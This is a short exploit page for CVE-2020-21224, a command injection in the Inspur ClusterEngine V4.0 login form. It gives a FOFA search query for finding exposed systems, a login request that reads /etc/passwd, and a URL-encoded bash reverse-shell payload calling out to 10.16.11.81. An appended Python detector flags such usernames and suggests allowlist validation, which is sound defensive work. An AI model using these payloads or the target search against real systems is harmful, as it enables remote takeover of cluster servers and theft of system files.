Inspur ClusterEngineV4.0 Cluster Management System Command Execution Vulnerability (CVE-2020-21224)
FOFA:
title="TSCEV4.0"
The username parameter of the login request is vulnerable to RCE; a crafted parameter value leads directly to command execution:
POST /login.php
op=login&username=;`cat /etc/passwd`&password="
shell op=login&username=1 2\',\'1\'\); `bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.16.11.81%2F80%200%3E%261`
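
A defender-side check for the injection described above, as an added example that is not part of the original page: it parses POST bodies sent to /login.php and flags username values that contain shell metacharacters. The allowlist pattern, the function names and the sample records are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

LOGIN_PATH = "/login.php"  # endpoint named on the page
# Assumed account-name policy; adjust to the site's real username rules.
ALLOWED_USERNAME = re.compile(r"[A-Za-z0-9._@-]{1,64}")
# Tokens a shell treats specially; none belongs in an account name.
SHELL_META = ("`", "$(", ";", "|", "&", ">", "<", "\n")

def parse_form(body):
    """Decode an application/x-www-form-urlencoded body into {name: value}."""
    fields = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        fields[unquote_plus(name)] = unquote_plus(value)
    return fields

def inspect_login(method, path, body):
    """Return the shell tokens found in a login request's username, or [] if clean."""
    if method != "POST" or path.split("?")[0] != LOGIN_PATH:
        return []
    fields = parse_form(body)
    if fields.get("op") != "login":
        return []
    username = fields.get("username", "")
    if ALLOWED_USERNAME.fullmatch(username):
        return []
    hits = [tok for tok in SHELL_META if tok in username]
    return hits or ["non-allowlisted"]

def scan(records):
    """Return (index, findings) for every record whose username fails validation."""
    return [(i, f) for i, r in enumerate(records) if (f := inspect_login(*r))]

# Constructed sample records (method, path, body).
# The second body is the request shown on the page; the others are made up.
SAMPLES = [
    ("POST", "/login.php", "op=login&username=admin&password=secret"),
    ("POST", "/login.php", 'op=login&username=;`cat /etc/passwd`&password="'),
    ("POST", "/login.php", "op=login&username=ops%60uptime%60&password=x"),
    ("GET", "/index.php", ""),
]

if __name__ == "__main__":
    for idx, findings in scan(SAMPLES):
        print(f"record {idx}: suspicious username, tokens={findings}")
```

The same allowlist, enforced server-side before the username reaches any shell invocation, is the corresponding input-validation control.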